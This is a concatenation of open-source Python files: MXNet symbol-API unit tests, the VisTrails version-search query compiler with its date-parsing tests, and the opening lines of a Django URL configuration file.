data = pkl.dumps(mlist)
mlist2 = pkl.loads(data)
for x, y in zip(mlist, mlist2):
assert x.tojson() == y.tojson()
def test_symbol_saveload():
sym = models.mlp2()
fname = 'tmp_sym.json'
sym.save(fname)
data2 = mx.symbol.load(fname)
# save because of order
assert sym.tojson() == data2.tojson()
os.remove(fname)
def test_symbol_infer_type():
data = mx.symbol.Variable('data')
f32data = mx.symbol.Cast(data=data, dtype='float32')
fc1 = mx.symbol.FullyConnected(data = f32data, name='fc1', num_hidden=128)
mlp = mx.symbol.SoftmaxOutput(data = fc1, name = 'softmax')
arg, out, aux = mlp.infer_type(data=np.float16)
assert arg == [np.float16, np.float32, np.float32, np.float32]
assert out == [np.float32]
assert aux == []
def test_symbol_infer_shape():
num_hidden = 128
num_dim = 64
num_sample = 10
data = mx.symbol.Variable('data')
prev = mx.symbol.Variable('prevstate')
x2h = mx.symbol.FullyConnected(data=data, name='x2h', num_hidden=num_hidden)
h2h = mx.symbol.FullyConnected(data=prev, name='h2h', num_hidden=num_hidden)
out = mx.symbol.Activation(data=mx.sym.elemwise_add(x2h, h2h), name='out', act_type='relu')
# shape inference will fail because information is not available for h2h
ret = out.infer_shape(data=(num_sample, num_dim))
assert ret == (None, None, None)
arg, out_shapes, aux_shapes = out.infer_shape_partial(data=(num_sample, num_dim))
arg_shapes = dict(zip(out.list_arguments(), arg))
assert arg_shapes['data'] == (num_sample, num_dim)
assert arg_shapes['x2h_weight'] == (num_hidden, num_dim)
assert arg_shapes['h2h_weight'] == ()
# now we can do full shape inference
state_shape = out_shapes[0]
arg, out_shapes, aux_shapes = out.infer_shape(data=(num_sample, num_dim), prevstate=state_shape)
arg_shapes = dict(zip(out.list_arguments(), arg))
assert arg_shapes['data'] == (num_sample, num_dim)
assert arg_shapes['x2h_weight'] == (num_hidden, num_dim)
assert arg_shapes['h2h_weight'] == (num_hidden, num_hidden)
def test_symbol_infer_shape_var():
"Test specifying shape information when constructing a variable"
shape = (2, 3)
a = mx.symbol.Variable('a', shape=shape)
b = mx.symbol.Variable('b')
c = mx.symbol.elemwise_add(a, b)
arg_shapes, out_shapes, aux_shapes = c.infer_shape()
assert arg_shapes[0] == shape
assert arg_shapes[1] == shape
assert out_shapes[0] == shape
overwrite_shape = (5, 6)
arg_shapes, out_shapes, aux_shapes = c.infer_shape(a=overwrite_shape)
assert arg_shapes[0] == overwrite_shape
assert arg_shapes[1] == overwrite_shape
assert out_shapes[0] == overwrite_shape
def test_symbol_fluent():
has_grad = set(['flatten', 'expand_dims', 'flip', 'tile', 'transpose', 'sum', 'nansum', 'prod',
'nanprod', 'mean', 'max', 'min', 'reshape', 'broadcast_to', 'split',
'broadcast_axes', 'pad', 'swapaxes', 'slice', 'slice_axis', 'slice_like',
'take', 'one_hot', 'pick', 'sort', 'topk', 'argsort', 'argmax', 'argmin',
'clip', 'abs', 'sign', 'sin', 'cos', 'tan', 'arcsin', 'arccos', 'arctan',
'degrees', 'radians', 'sinh', 'cosh', 'tanh', 'arcsinh', 'arccosh', 'arctanh',
'exp', 'expm1', 'log', 'log10', 'log2', 'log1p', 'sqrt', 'rsqrt',
'square', 'reciprocal', 'reshape_like', 'cbrt', 'rcbrt', 'relu', 'sigmoid',
'softmax', 'log_softmax', 'rint', 'ceil', 'floor', 'trunc', 'fix'])
def check_fluent_regular(func, kwargs, shape=(5, 17, 1), equal_nan=False):
with mx.name.NameManager():
data = mx.symbol.Variable('data')
regular = getattr(mx.symbol, func)(data, name=func+'0', **kwargs)
fluent = getattr(data, func)(**kwargs)
check_symbol_consistency(regular, fluent, {'ctx': mx.context.current_context(),
'data': shape},
skip_grad=func not in has_grad,
equal_nan=equal_nan)
for func in ['flatten', 'norm', 'round', 'rint', 'fix', 'floor', 'ceil', 'trunc', 'zeros_like',
'ones_like', 'abs', 'sign', 'sin', 'cos', 'degrees', 'radians',
'exp', 'expm1', 'square', 'reciprocal', 'argmax_channel']:
check_fluent_regular(func, {})
for func in ['arccosh', 'arcsin', 'arccos', 'arctan', 'tan', 'sinh', 'cosh', 'tanh',
'arcsinh', 'arctanh', 'log', 'log10', 'log2', 'log1p', 'sqrt', 'rsqrt',
'cbrt', 'rcbrt', 'relu', 'sigmoid', 'softmax', 'log_softmax']:
check_fluent_regular(func, {}, equal_nan=True)
for func in ['expand_dims', 'flip', 'sort', 'topk', 'argsort', 'argmax', 'argmin']:
check_fluent_regular(func, {'axis': 1})
check_fluent_regular('one_hot', {'depth': 15})
check_fluent_regular('tile', {'reps': (1,2)})
check_fluent_regular('repeat', {'repeats': 3})
check_fluent_regular('transpose', {'axes': (1,0,2)})
check_fluent_regular('split', {'axis': 2, 'num_outputs': 3}, shape=(5, 17, 6))
check_fluent_regular('slice', {'begin': (2, 5, 1), 'end': (4, 7, 6)}, shape=(5, 17, 6))
check_fluent_regular('slice_axis', {'axis': 1, 'begin': 5, 'end': 7})
check_fluent_regular('slice_like', {'axes': (0, -2), 'shape_like': mx.sym.zeros((3, 3))})
check_fluent_regular('clip', {'a_min': 0.25, 'a_max': 0.75})
check_fluent_regular('broadcast_axes', {'axis': (2,), 'size': (5,)})
check_fluent_regular('pad', {'mode': 'constant', 'pad_width': (0,0,0,0,3,0,0,4)}, shape=(5, 17, 2, 3))
check_fluent_regular('reshape_like', {'rhs': mx.sym.ones((30, 17))}, shape=(5, 17, 2, 3))
for func in ['sum', 'nansum', 'prod', 'nanprod', 'mean', 'max', 'min', 'norm']:
check_fluent_regular(func, {'axis': (1, 2)})
check_fluent_regular('reshape', {'shape': (17, 1, 5)})
check_fluent_regular('broadcast_to', {'shape': (5, 17, 47)})
check_fluent_regular('squeeze', {'axis': (1, 3)}, shape=(2, 1, 3, 1, 4))
def check_symbol_consistency(sym1, sym2, ctx, skip_grad=False, equal_nan=False):
assert sym1.list_arguments() == sym2.list_arguments()
assert sym1.list_auxiliary_states() == sym2.list_auxiliary_states()
assert sym1.list_outputs() == sym2.list_outputs()
mx.test_utils.check_consistency([sym1, sym2], ctx_list=[ctx, ctx],
grad_req='null' if skip_grad else 'write',
equal_nan=equal_nan)
def test_load_000800():
with mx.AttrScope(ctx_group='stage1'):
data = mx.symbol.Variable('data', lr_mult=0.2)
weight = mx.sym.Variable(name='fc1_weight', lr_mult=1.2)
fc1 = mx.symbol.FullyConnected(data = data, weight=weight, name='fc1', num_hidden=128, wd_mult=0.3)
act1 = mx.symbol.Activation(data = fc1, name='relu1', act_type="relu")
set_stage1 = set(act1.list_arguments())
with mx.AttrScope(ctx_group='stage2'):
fc2 = mx.symbol.FullyConnected(data = act1, name = 'fc2', num_hidden = 64, lr_mult=0.01)
act2 = mx.symbol.Activation(data = fc2, name='relu2', act_type="relu")
fc3 = mx.symbol.FullyConnected(data = act2, name='fc3', num_hidden=10)
fc3 = mx.symbol.BatchNorm(fc3, name='batchnorm0')
sym1 = mx.symbol.SoftmaxOutput(data = fc3, name = 'softmax')
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sym2 = mx.sym.load(os.path.join(curr_path, 'save_000800.json'))
attr1 = sym1.attr_dict()
attr2 = sym2.attr_dict()
for k, v1 in attr1.items():
assert k in attr2, k
v2 = attr2[k]
for kk, vv1 in v1.items():
if kk.startswith('__') and kk.endswith('__'):
assert kk in v2 and v2[kk] == vv1, k + str(v1) + str(v2)
check_symbol_consistency(sym1, sym2,
{'ctx': mx.cpu(0), 'group2ctx': {'stage1' : mx.cpu(1), 'stage2' : mx.cpu(2)}, 'data': (1,200)})
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(2*a)
exe = b.simple_bind(ctx=mx.cpu(), a=(10,10))
def test_zero_prop():
data = mx.symbol.Variable('data')
for i in range(10):
data = data * data
exe = data.simple_bind(ctx=mx.cpu(), data=(10, 3, 256, 256))
big = int(re.search('Total (\d+) MB allocated', exe.debug_str()).group(1))
exe = data.simple_bind(ctx=mx.cpu(), data=(10, 3, 256, 256), grad_req='null')
small1 = int(re.search('Total (\d+) MB allocated', exe.debug_str()).group(1))
data = mx.sym.stop_gradient(data)
exe = data.simple_bind(ctx=mx.cpu(), data=(10, 3, 256, 256))
small2 = int(re.search('Total (\d+) MB allocated', exe.debug_str()).group(1))
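# With gradients disabled (grad_req='null') or the graph cut by stop_gradient, the
# backward-pass buffers need not be allocated, so both "small" plans should agree
# and stay below the full training plan measured in `big`.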
assert big > small2
assert small1 == small2
def test_zero_prop2():
x = mx.sym.Variable('x')
idx = mx.sym.Variable('idx')
y = mx.sym.batch_take(x, idx)
z = mx.sym.stop_gradient(y)
exe = z.simple_bind(ctx=mx.cpu(), x=(10, 10), idx=(10,),
type_dict={'x': np.float32, 'idx': np.int32})
exe.forward()
exe.backward()
# The following bind() should throw an exception. We discard the expected stderr
# output for this operation only in order to keep the test logs clean.
with discard_stderr():
try:
y.simple_bind(ctx=mx.cpu(), x=(10, 10), idx=(10,),
type_dict={'x': np.float32, 'idx': np.int32})
except:
return
assert False
def test_simple_bind_incomplete_shape_inference_in_one_forward_pass():
"""This is a special case that results in shape inference
failure after moving simple_bind logic from frontend to backend.
Added here for testing against a network similar to the following one.
Network diagram:
weight --> abs_op --> sum_op --
                              \
                               |--> add_op
data   --> fc_op  --> sum_op --
Given data's shape, if the shape inference starts from the weight node,
then the node entries of abs_op and sum_op are unknown in the
forward pass. Therefore, there are several unknown shapes after the
first forward pass is done. Now the backward inference pass starts with
the assumption that there are no unknown-shape node entries in the forward
pass, and consequently leads to a CHECK_EQ failure.
"""
data_shape = (5, 13)
data = mx.sym.Variable('data')
fc = mx.sym.FullyConnected(data=data, num_hidden=1, no_bias=True, name='fc')
modified_weight = mx.sym.abs(fc.get_internals()['fc_weight'])
net = mx.sym.sum(modified_weight) + mx.sym.sum(fc)
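# 'fc' plays the role of fc_op in the diagram above and mx.sym.abs of its weight is
# the abs_op branch; simple_bind has to finish shape inference even though a single
# forward pass over this graph leaves some node entries unknown.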
net.simple_bind(ctx=mx.cpu(), data=data_shape)
def test_simple_bind_gradient_graph_possible_with_cycle():
"""This is a special case that results in a cycle in the gradient graph
before this bug was fixed. With the following symbol, the node entries
passed into function AggregateGradient(std::vector<nnvm::NodeEntry>&& v)
are the outputs of the same node. Therefore, adding a node to the
control_deps of itself must be skipped.
See GitHub issue:
https://github.com/apache/incubator-mxnet/issues/8029
for more details."""
data = mx.symbol.Variable('data')
res = data + data + data + data + data + data + data + data
res.simple_bind(ctx=mx.cpu(), data=(1,))
if __name__ == '__main__':
import nose
nose.runmodule()
|
CMUSV-VisTrails/WorkflowRecommendation | refs/heads/master | vistrails/core/query/version.py | 1 | ###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
# We need to remove QtGui and QtCore references by storing all of our
# notes in plain text, not html; this should be fixed later
from core.query import extract_text
import core.utils
import re
import time
################################################################################
class SearchParseError(Exception):
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
class SearchStmt(object):
def __init__(self, content):
self.text = content
self.content = re.compile('.*'+content+'.*', re.MULTILINE | re.IGNORECASE)
def match(self, vistrail, action):
return True
def matchModule(self, v, m):
return True
def run(self, v, n):
pass
def __call__(self):
"""Make SearchStmt behave just like a QueryObject."""
return self
class TimeSearchStmt(SearchStmt):
oneSecond = 1.0
oneMinute = oneSecond * 60.0
oneHour = oneMinute * 60.0
oneDay = oneHour * 24.0
oneWeek = oneDay * 7.0
oneMonth = oneDay * 31.0 # wrong, I know
oneYear = oneDay * 365.0 # wrong, I know
amounts = {'seconds': oneSecond,
'minutes': oneMinute,
'hours': oneHour,
'days': oneDay,
'weeks': oneWeek,
'months': oneMonth,
'years': oneYear}
months = {'january': 1,
'february': 2,
'march': 3,
'april': 4,
'may': 5,
'june': 6,
'july': 7,
'august': 8,
'september': 9,
'october': 10,
'november': 11,
'december': 12}
dateEntry = r'([^\,\/\: ]+)'
timeEntry = r'(\d?\d?)'
dateSep = r' *[\,\/\- ] *'
timeSep = r' *: *'
sep = r' *'
start = r'^ *'
finish = r' *$'
twoEntryDate = (dateEntry+
dateSep+
dateEntry)
threeEntryDate = (dateEntry+
dateSep+
dateEntry+
dateSep+
dateEntry)
twoEntryTime = (timeEntry+
timeSep+
timeEntry)
threeEntryTime = (timeEntry+
timeSep+
timeEntry+
timeSep+
timeEntry)
dateRE = [re.compile((start+
twoEntryDate+
finish)), # Mar 12 Mar, 12
re.compile((start+
threeEntryDate+
finish)), # Mar, 12, 2006 2006 Mar 12 etc
re.compile((start+
twoEntryTime+
finish)),
re.compile((start+
threeEntryTime+
finish)),
re.compile((start+
twoEntryDate+
sep+
twoEntryTime+
finish)),
re.compile((start+
twoEntryDate+
sep+
threeEntryTime+
finish)),
re.compile((start+
threeEntryDate+
sep+
twoEntryTime+
finish)),
re.compile((start+
threeEntryDate+
sep+
threeEntryTime+
finish)),
re.compile((start+
twoEntryTime+
sep+
twoEntryDate+
finish)),
re.compile((start+
twoEntryTime+
sep+
threeEntryDate+
finish)),
re.compile((start+
threeEntryTime+
sep+
twoEntryDate+
finish)),
re.compile((start+
threeEntryTime+
sep+
threeEntryDate+
finish))]
def __init__(self, date):
self.date = self.parseDate(date)
def parseDate(self, dateStr):
def parseAgo(s):
[amount, unit] = s.split(' ')
try:
amount = float(amount)
except ValueError:
raise SearchParseError("Expected a number, got %s" % amount)
if amount <= 0:
raise SearchParseError("Expected a positive number, got %s" % amount)
unitRe = re.compile('^'+unit)
keys = [k
for k in TimeSearchStmt.amounts.keys()
if unitRe.match(k)]
if len(keys) == 0:
raise SearchParseError("Time unit unknown: %s" % unit)
elif len(keys) > 1:
raise SearchParseError("Time unit ambiguous: %s matches %s" % (unit, keys))
return round(time.time()) - TimeSearchStmt.amounts[keys[0]] * amount
def guessDate(unknownEntries, year=None):
def guessStrMonth(s):
monthRe = re.compile('^'+s)
keys = [k
for k in TimeSearchStmt.months.keys()
if monthRe.match(k)]
if len(keys) == 0:
raise SearchParseError("Unknown month: %s" % s)
elif len(keys) > 1:
raise SearchParseError("Ambiguous month: %s matches %s" % (s, keys))
return TimeSearchStmt.months[keys[0]]
if not year:
m = None
# First heuristic: if month comes first, then year comes last
try:
e0 = int(unknownEntries[0])
except ValueError:
m = guessStrMonth(unknownEntries[0])
try:
d = int(unknownEntries[1])
except ValueError:
raise SearchParseError("Expected day, got %s" % unknownEntries[1])
try:
y = int(unknownEntries[2])
except ValueError:
raise SearchParseError("Expected year, got %s" % unknownEntries[2])
return (y, m, d)
# Second heuristic: if month comes last, then year comes first
try:
e2 = int(unknownEntries[2])
except ValueError:
m = guessStrMonth(unknownEntries[2])
try:
d = int(unknownEntries[1])
except ValueError:
raise SearchParseError("Expected day, got %s" % unknownEntries[1])
try:
y = int(unknownEntries[0])
except ValueError:
raise SearchParseError("Expected year, got %s" % unknownEntries[0])
return (y, m, d)
# If month is the middle one, decide day and year by size
# (year is largest, hopefully year was entered using 4 digits)
try:
e1 = int(unknownEntries[1])
except ValueError:
m = guessStrMonth(unknownEntries[1])
try:
d = int(unknownEntries[2])
except ValueError:
raise SearchParseError("Expected day or year, got %s" % unknownEntries[2])
try:
y = int(unknownEntries[0])
except ValueError:
raise SearchParseError("Expected year or year, got %s" % unknownEntries[0])
return (max(y,d), m, min(y, d))
lst = [(e0,0),(e1,1),(e2,2)]
lst.sort()
return guessDate([str(lst[0][0]),
str(lst[1][0])],
year=e2)
# We know year, decide month using similar heuristics - try string month first,
# then decide which is possible
try:
e0 = int(unknownEntries[0])
except ValueError:
m = guessStrMonth(unknownEntries[0])
try:
d = int(unknownEntries[1])
except ValueError:
raise SearchParseError("Expected day, got %s" % unknownEntries[1])
return (year, m, d)
try:
e1 = int(unknownEntries[1])
except ValueError:
m = guessStrMonth(unknownEntries[1])
try:
d = int(unknownEntries[0])
except ValueError:
raise SearchParseError("Expected day, got %s" % unknownEntries[0])
return (year, m, d)
if e0 > 12:
return (year, e1, e0)
else:
return (year, e0, e1)
dateStr = dateStr.lower().lstrip().rstrip()
if dateStr.endswith(" ago"):
return parseAgo(dateStr[:-4])
if dateStr == "yesterday":
lst = list(time.localtime(round(time.time()) - TimeSearchStmt.oneDay))
# Reset hour, minute, second
lst[3] = 0
lst[4] = 0
lst[5] = 0
return time.mktime(lst)
if dateStr == "today":
lst = list(time.localtime())
# Reset hour, minute, second
lst[3] = 0
lst[4] = 0
lst[5] = 0
return time.mktime(lst)
if dateStr.startswith("this "):
rest = dateStr[5:]
lst = list(time.localtime(round(time.time())))
if rest == "minute":
lst[5] = 0
elif rest == "hour":
lst[5] = 0
lst[4] = 0
elif rest == "day":
lst[5] = 0
lst[4] = 0
lst[3] = 0
elif rest == "week": # weeks start on monday
lst[5] = 0
lst[4] = 0
lst[3] = 0
# This hack saves me the hassle of computing negative days, months, etc
lst = list(time.localtime(time.mktime(lst) - TimeSearchStmt.oneDay * lst[6]))
elif rest == "month":
lst[5] = 0
lst[4] = 0
lst[3] = 0
lst[2] = 1
elif rest == "year":
lst[5] = 0
lst[4] = 0
lst[3] = 0
lst[2] = 1
lst[1] = 1
return time.mktime(lst)
result = [x.match(dateStr) for x in TimeSearchStmt.dateRE]
this = list(time.localtime())
def setTwoDate(g):
d = guessDate(g, year=this[0])
this[0] = d[0]
this[1] = d[1]
this[2] = d[2]
def setThreeDate(g):
d = guessDate(g)
this[0] = d[0]
this[1] = d[1]
this[2] = d[2]
def setTwoTime(g):
this[3] = int(g[0])
this[4] = int(g[1])
this[5] = 0
def setThreeTime(g):
this[3] = int(g[0])
this[4] = int(g[1])
this[5] = int(g[2])
if result[0]:
setTwoDate(result[0].groups())
setTwoTime([0,0])
elif result[1]:
setThreeDate(result[1].groups())
setTwoTime([0,0])
elif result[2]:
setTwoTime(result[2].groups())
elif result[3]:
setThreeTime(result[3].groups())
elif result[4]:
g = result[4].groups()
setTwoDate([g[0], g[1]])
setTwoTime([g[2], g[3]])
elif result[5]:
g = result[5].groups()
setTwoDate([g[0], g[1]])
setThreeTime([g[2], g[3], g[4]])
elif result[6]:
g = result[6].groups()
setThreeDate([g[0], g[1], g[2]])
setTwoTime([g[3], g[4]])
elif result[7]:
g = result[7].groups()
setThreeDate([g[0], g[1], g[2]])
setThreeTime([g[3], g[4], g[5]])
elif result[8]:
g = result[8].groups()
setTwoTime([g[0], g[1]])
setTwoDate([g[2], g[3]])
elif result[9]:
g = result[9].groups()
setTwoTime([g[0], g[1]])
setThreeDate([g[2], g[3], g[4]])
elif result[10]:
g = result[10].groups()
setThreeTime([g[0], g[1], g[2]])
setTwoDate([g[3], g[4]])
elif result[11]:
g = result[11].groups()
setThreeTime([g[0], g[1], g[2]])
setThreeDate([g[3], g[4],g[5]])
else:
raise SearchParseError("Expected a date, got '%s'" % dateStr)
return time.mktime(this)
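# A few illustrative inputs accepted by parseDate, shown here as a sketch (the unit
# tests at the bottom of this file exercise the same formats):
#
#   TimeSearchStmt('2 days ago')            # relative: now minus 2 * oneDay
#   TimeSearchStmt('yesterday')             # start of the previous day
#   TimeSearchStmt('this week')             # start of the current week (Monday)
#   TimeSearchStmt('12 mar 2006')           # absolute date, time defaults to 00:00
#   TimeSearchStmt('21:00:00 12 mar 2007')  # time plus date, in either order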
class BeforeSearchStmt(TimeSearchStmt):
def match(self, vistrail, action):
if not action.date:
return False
t = time.mktime(time.strptime(action.date, "%d %b %Y %H:%M:%S"))
return t <= self.date
class AfterSearchStmt(TimeSearchStmt):
def match(self, vistrail, action):
if not action.date:
return False
t = time.mktime(time.strptime(action.date, "%d %b %Y %H:%M:%S"))
return t >= self.date
class UserSearchStmt(SearchStmt):
def match(self, vistrail, action):
if not action.user:
return False
return self.content.match(action.user)
class NotesSearchStmt(SearchStmt):
def match(self, vistrail, action):
if vistrail.has_notes(action.id):
plainNotes = extract_text(vistrail.get_notes(action.id))
return self.content.search(plainNotes)
return False
class NameSearchStmt(SearchStmt):
def match(self, vistrail, action):
m = 0
tm = vistrail.get_tagMap()
if action.timestep in tm:
m = self.content.match(tm[action.timestep])
if bool(m) == False:
m = self.content.match(vistrail.get_description(action.timestep))
return bool(m)
class ModuleSearchStmt(SearchStmt):
def match(self, vistrail, action):
pipeline = vistrail.getPipeline(action.timestep)
for module in pipeline.modules.itervalues():
if self.content.match(module.name):
return True
return False
class AndSearchStmt(SearchStmt):
def __init__(self, lst):
self.matchList = lst
def match(self, vistrail, action):
for s in self.matchList:
if not s.match(vistrail, action):
return False
return True
class OrSearchStmt(SearchStmt):
def __init__(self, lst):
self.matchList = lst
def match(self, vistrail, action):
for s in self.matchList:
if s.match(vistrail, action):
return True
return False
class NotSearchStmt(SearchStmt):
def __init__(self, stmt):
self.stmt = stmt
def match(self, vistrail, action):
return not self.stmt.match(action)
class TrueSearch(SearchStmt):
def __init__(self):
pass
def match(self, vistrail, action):
return True
################################################################################
class SearchCompiler(object):
SEPARATOR = -1
def __init__(self, searchStr):
self.searchStmt = self.compile(searchStr)
def compile(self, searchStr):
lst = []
t1 = searchStr.split(' ')
while t1:
tok = t1[0]
cmd = tok.split(':')
if not SearchCompiler.dispatch.has_key(cmd[0]):
fun = SearchCompiler.parseAny
else:
fun = SearchCompiler.dispatch[cmd[0]]
if len(cmd) > 1:
[search, rest] = fun(self, cmd[1:] + t1[1:])
else:
[search, rest] = fun(self, t1)
lst.append(search)
t1 = rest
return AndSearchStmt(lst)
def parseUser(self, tokStream):
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
return (UserSearchStmt(tokStream[0]), tokStream[1:])
def parseAny(self, tokStream):
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
tok = tokStream[0]
return (OrSearchStmt([UserSearchStmt(tok),
NotesSearchStmt(tok),
NameSearchStmt(tok)]), tokStream[1:])
def parseNotes(self, tokStream):
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
lst = []
while len(tokStream):
tok = tokStream[0]
if ':' in tok:
return (AndSearchStmt(lst), tokStream)
lst.append(NotesSearchStmt(tok))
tokStream = tokStream[1:]
return (AndSearchStmt(lst), [])
def parseName(self, tokStream):
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
lst = []
while len(tokStream):
tok = tokStream[0]
if ':' in tok:
return (AndSearchStmt(lst), tokStream)
lst.append(NameSearchStmt(tok))
tokStream = tokStream[1:]
return (AndSearchStmt(lst), [])
def parseModule(self, tokStream):
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
lst = []
while len(tokStream):
tok = tokStream[0]
if ':' in tok:
return (AndSearchStmt(lst), tokStream)
lst.append(ModuleSearchStmt(tok))
tokStream = tokStream[1:]
return (AndSearchStmt(lst), [])
def parseBefore(self, tokStream):
old_tokstream = tokStream
try:
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
lst = []
while len(tokStream):
tok = tokStream[0]
# ugly, special case times
if (':' in tok and
not TimeSearchStmt.dateRE[2].match(tok) and
not TimeSearchStmt.dateRE[3].match(tok)):
return (BeforeSearchStmt(" ".join(lst)), tokStream)
lst.append(tok)
tokStream = tokStream[1:]
return (BeforeSearchStmt(" ".join(lst)), [])
except SearchParseError, e:
if 'Expected a date' in e.args[0]:
try:
return self.parseAny(old_tokstream)
except SearchParseError, e2:
print "Another exception...", e2.args[0]
raise e
else:
raise
def parseAfter(self, tokStream):
try:
if len(tokStream) == 0:
raise SearchParseError('Expected token, got end of search')
lst = []
while len(tokStream):
tok = tokStream[0]
# ugly, special case times
if (':' in tok and
not TimeSearchStmt.dateRE[2].match(tok) and
not TimeSearchStmt.dateRE[3].match(tok)):
return (AfterSearchStmt(" ".join(lst)), tokStream)
lst.append(tok)
tokStream = tokStream[1:]
return (AfterSearchStmt(" ".join(lst)), [])
except SearchParseError, e:
if 'Expected a date' in e.args[0]:
try:
return self.parseAny(['after'] + tokStream)
except SearchParseError, e2:
print "Another exception...", e2.args[0]
raise e
else:
raise
dispatch = {'user': parseUser,
'notes': parseNotes,
'before': parseBefore,
'after': parseAfter,
'name': parseName,
'module': parseModule,
'any': parseAny}
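# Illustrative use of the compiler, as exercised by the tests below ('alice' is a
# hypothetical user name): the parsed statement can be matched against an action, e.g.
#
#   stmt = SearchCompiler('user:alice after:yesterday').searchStmt
#   stmt.match(vistrail, action)  # True only if every sub-statement matches
#
# Unprefixed tokens fall back to parseAny, which ORs the user, notes and name matches.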
################################################################################
import unittest
import datetime
class TestSearch(unittest.TestCase):
def test1(self):
self.assertEquals((TimeSearchStmt('1 day ago').date -
TimeSearchStmt('2 days ago').date), TimeSearchStmt.oneDay)
def test2(self):
self.assertEquals((TimeSearchStmt('12 mar 2006').date -
TimeSearchStmt('11 mar 2006').date), TimeSearchStmt.oneDay)
def test3(self):
# This will fail if year flips during execution. Oh well :)
yr = datetime.datetime.today().year
self.assertEquals((TimeSearchStmt('12 mar').date -
TimeSearchStmt('12 mar %d' % yr).date), 0.0)
def test4(self):
# This will fail if year flips during execution. Oh well :)
yr = datetime.datetime.today().year
self.assertEquals((TimeSearchStmt('mar 12').date -
TimeSearchStmt('12 mar %d' % yr).date), 0.0)
def test5(self):
yr = datetime.datetime.today().year
self.assertEquals((TimeSearchStmt('03 15').date -
TimeSearchStmt('15 mar %d' % yr).date), 0.0)
def test6(self):
self.assertEquals((TimeSearchStmt('03/15/2006').date -
TimeSearchStmt('15 mar 2006').date), 0.0)
def test7(self):
self.assertEquals((TimeSearchStmt('1 day ago').date -
TimeSearchStmt('24 hours ago').date), 0.0)
def test8(self):
self.assertEquals((TimeSearchStmt('1 hour ago').date -
TimeSearchStmt('60 minutes ago').date), 0.0)
def test9(self):
self.assertEquals((TimeSearchStmt('1 minute ago').date -
TimeSearchStmt('60 seconds ago').date), 0.0)
def test10(self):
self.assertEquals((TimeSearchStmt('1 week ago').date -
TimeSearchStmt('7 days ago').date), 0.0)
def test11(self):
self.assertEquals((TimeSearchStmt('1 month ago').date -
TimeSearchStmt('31 days ago').date), 0.0)
def test12(self):
self.assertEquals(TimeSearchStmt('12 mar 2007 21:00:00').date,
TimeSearchStmt('21:00:00 12 mar 2007').date)
def test13(self):
# This will fail if year flips during execution. Oh well :)
yr = datetime.datetime.today().year
self.assertEquals(TimeSearchStmt('12 mar %d 21:00' % yr).date,
TimeSearchStmt('21:00:00 12 mar').date)
def test14(self):
self.assertEquals(TimeSearchStmt('13 apr 2006 21:00').date,
TimeSearchStmt('04/13/2006 21:00:00').date)
def test15(self):
import core.vistrail
from core.db.locator import XMLFileLocator
import core.system
v = XMLFileLocator(core.system.vistrails_root_directory() +
'/tests/resources/dummy.xml').load()
# FIXME: Add notes to this.
# self.assertTrue(NotesSearchStmt('mapper').match(v.actionMap[36]))
# self.assertFalse(NotesSearchStmt('-qt-block-indent').match(v.actionMap[36]))
# test16 and 17 now pass.
# def test16(self):
# self.assertRaises(SearchParseError, lambda *args: SearchCompiler('before:'))
# def test17(self):
# self.assertRaises(SearchParseError, lambda *args: SearchCompiler('after:yesterday before:lalala'))
def test18(self):
self.assertEquals(TimeSearchStmt(' 13 apr 2006 ').date,
TimeSearchStmt(' 13 apr 2006 ').date)
def test19(self):
self.assertEquals(SearchCompiler('before:13 apr 2006 12:34:56').searchStmt.matchList[0].date,
BeforeSearchStmt('13 apr 2006 12:34:56').date)
def test20(self):
self.assertEquals(SearchCompiler('after:yesterday').searchStmt.matchList[0].date,
SearchCompiler('before:yesterday').searchStmt.matchList[0].date)
def test21(self):
self.assertEquals(SearchCompiler('after:today').searchStmt.matchList[0].date,
SearchCompiler('before:today').searchStmt.matchList[0].date)
def test22(self):
self.assertEquals(SearchCompiler('before:today').searchStmt.matchList[0].date,
SearchCompiler('before:this day').searchStmt.matchList[0].date)
def test23(self):
t = time.localtime()
import core.utils
inv = core.utils.invert(TimeSearchStmt.months)
m = inv[t[1]]
self.assertEquals(SearchCompiler('after:%s %s %s' % (t[0], m, t[2])).searchStmt.matchList[0].date,
SearchCompiler('after:today').searchStmt.matchList[0].date)
def test24(self):
# Test compiling these searches
SearchCompiler('before')
SearchCompiler('after')
if __name__ == '__main__':
unittest.main()
|
DenysGurin/projt1 | refs/heads/master | projt1/urls.py | 1 | """projt1 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
